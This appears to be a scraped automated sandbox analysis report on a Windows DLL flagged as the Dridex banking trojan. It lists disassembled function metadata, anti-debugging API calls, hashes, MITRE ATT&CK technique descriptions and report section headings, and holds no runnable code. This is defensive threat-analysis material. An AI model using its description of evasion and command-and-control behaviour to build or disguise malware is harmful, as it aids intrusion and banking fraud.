Function 6EA6FC10, Relevance: 7.8, APIs: 5, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee252695d26eb005d8b7cae4ee7717c6cbc39bd783c99c8e2167120beac8cb62
Instruction ID: 8439a31f6e8208db9c7cd926f88c1071951335038549d1a23e544ac38ab5fa71
Opcode Fuzzy Hash: ee252695d26eb005d8b7cae4ee7717c6cbc39bd783c99c8e2167120beac8cb62
Instruction Fuzzy Hash: 96B11574900218EFDB04CFD4C994BEEBBB5BF46314F248558E426AB394D734AE84CB99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA697B0, Relevance: 7.6, APIs: 5, Instructions: 116threadtimeCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,6EA69B96,6EABE700,6EB3A5A0,6EA77094,?,6EA77094,6EB3A5A0,6EABE700,00012010), ref: 6EA697C0
IsDebuggerPresent.KERNEL32(?,?,?,?,6EA69B96,6EABE700,6EB3A5A0,6EA77094,?,6EA77094,6EB3A5A0,6EABE700,00012010), ref: 6EA697FA

Part of subcall function 6EA69A50: OutputDebugStringW.KERNEL32(?,?,6EA697D9,00000000,?,?,?,?,6EA69B96,6EABE700,6EB3A5A0,6EA77094,?,6EA77094,6EB3A5A0), ref: 6EA69A5B

CreateThread.KERNEL32(00000000,00000000,6EA699E0,?,00000000,00000000), ref: 6EA69852
std::_Timevec::_Timevec.LIBCPMTD ref: 6EA6985C
WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000), ref: 6EA69894

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: DebuggerPresent$CreateDebugObjectOutputSingleStringThreadTimevecTimevec::_Waitstd::_
String ID:
API String ID: 3615580482-0
Opcode ID: be8e608ff346eef59dff9a437c3f4c15a5e5764ac105b8a7729dfc885180a876
Instruction ID: 8f2e378a0507a14bbc81b83de2f9b1ef8774d73aec3dd17fcd29f14f013d97f4
Opcode Fuzzy Hash: be8e608ff346eef59dff9a437c3f4c15a5e5764ac105b8a7729dfc885180a876
Instruction Fuzzy Hash: 3F4193B1D04219EBDF04CFE5CA50BEE77B8BF06304F148559E416AB190EB349B85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EA6DBF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

U, xrefs: 6EA6DC16

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 13b120cb74f2fc6d562fda2e12ad54cf13fa59af4b1b9be82d2543df4a5d1850
Instruction ID: 2b469291f301e2f223340aa1ebfd149bd74c2b7889aaca5dfff364c97cf46e9f
Opcode Fuzzy Hash: 13b120cb74f2fc6d562fda2e12ad54cf13fa59af4b1b9be82d2543df4a5d1850
Instruction Fuzzy Hash: 8411A575910208FFCB00DAF8DD45F8E7B79AB45349F204954E508BB241E67296858B98

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8A460, Relevance: 6.1, APIs: 4, Instructions: 146fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 6EA8A5B0
GetLastError.KERNEL32 ref: 6EA8A5C5
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 6EA8A655
GetLastError.KERNEL32 ref: 6EA8A65F

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: ErrorLast$ByteCharFileMultiWideWrite
String ID:
API String ID: 3971981585-0
Opcode ID: d1fad1c90958fcff7a5e1448d8a545e7289cba248f430d7e12661d5efb7faee6
Instruction ID: cd65657f2715253bcfa8600e8c7cb992b0004089d2f21fcd960a5918a7eef8fb
Opcode Fuzzy Hash: d1fad1c90958fcff7a5e1448d8a545e7289cba248f430d7e12661d5efb7faee6
Instruction Fuzzy Hash: 8C717274A002299FCB24CF59C980AD9B7B5BF48304F5481E9E90DA73A5D730AEC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA775F0, Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,00000000,00000000), ref: 6EA77652
__wcstombs_l.LIBCMTD ref: 6EA776A7
MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000), ref: 6EA7773A
GetStringTypeW.KERNEL32(?,00000000), ref: 6EA7777A

Memory Dump Source

Source File: 00000003.00000002.690953815.000000006EA2D000.00000020.00020000.sdmp, Offset: 6EA2D000, based on PE: false

Similarity

API ID: ByteCharMultiWide$StringType__wcstombs_l
String ID:
API String ID: 2895191225-0
Opcode ID: 2cac59a3dabae4020654e2a89e9169ca6635d53c89378f363a748f1fb4ccd770
Instruction ID: 75b80ced926104018f4eb86e9251df60505fc5a6484cc299e066824ac9c49bd9
Opcode Fuzzy Hash: 2cac59a3dabae4020654e2a89e9169ca6635d53c89378f363a748f1fb4ccd770
Instruction Fuzzy Hash: 3A512975910208EFDB04DFE8C995FEEB779AF54308F144958E501B7280EB31AA85CFA8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.8232.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTPS Proxied Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6E9F51A7, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 235
sleepCOMMON

Function 6EA03930, Relevance: 6.8, APIs: 4, Instructions: 834
COMMON

Function 6EA06C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Function 6EA239F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Function 6EA022A0, Relevance: 1.6, APIs: 1, Instructions: 69
nativeCOMMON

Function 6EA07A60, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 6EA047B0, Relevance: 3.6, APIs: 2, Instructions: 618
COMMON

Function 6E9F543B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91
libraryCOMMON

Function 6E9F54F5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Function 6EA23370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Function 6EA1CAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Function 6EA1C790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Function 6EA1C2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Function 6EA0430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Function 6EA23820, Relevance: 1.7, APIs: 1, Instructions: 151
networkCOMMON

Function 6EA1C580, Relevance: 1.6, APIs: 1, Instructions: 98
registryCOMMON

Function 6EA1C405, Relevance: 1.6, APIs: 1, Instructions: 83
registryCOMMON

Function 6EA01030, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Function 6E9FB254, Relevance: 2.5, Strings: 1, Instructions: 1249
COMMONCrypto

Function 6EA13EC0, Relevance: 2.4, Strings: 1, Instructions: 1131
COMMONCrypto

Function 6EA162F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Function 6EA0C590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Function 6E9F1784, Relevance: 2.1, Strings: 1, Instructions: 877
COMMONCrypto

Function 6EA12E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Function 6EA17660, Relevance: 2.0, Strings: 1, Instructions: 793
COMMONCrypto

Function 6EA0D030, Relevance: 2.0, Strings: 1, Instructions: 789
COMMONCrypto

Function 6EA0AE80, Relevance: 2.0, Strings: 1, Instructions: 719
COMMONCrypto

Function 6EA0B6F0, Relevance: 2.0, Strings: 1, Instructions: 704
COMMONCrypto

Function 6EA0A660, Relevance: 1.9, Strings: 1, Instructions: 690
COMMONCrypto

Function 6EA11EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Function 6EA126B0, Relevance: 1.9, Strings: 1, Instructions: 653
COMMONCrypto

Function 6EA11730, Relevance: 1.9, Strings: 1, Instructions: 649
COMMONCrypto

Function 6E9F9E70, Relevance: 1.8, Strings: 1, Instructions: 591
COMMONCrypto

Function 6EA14CA0, Relevance: 1.6, Strings: 1, Instructions: 358
COMMONCrypto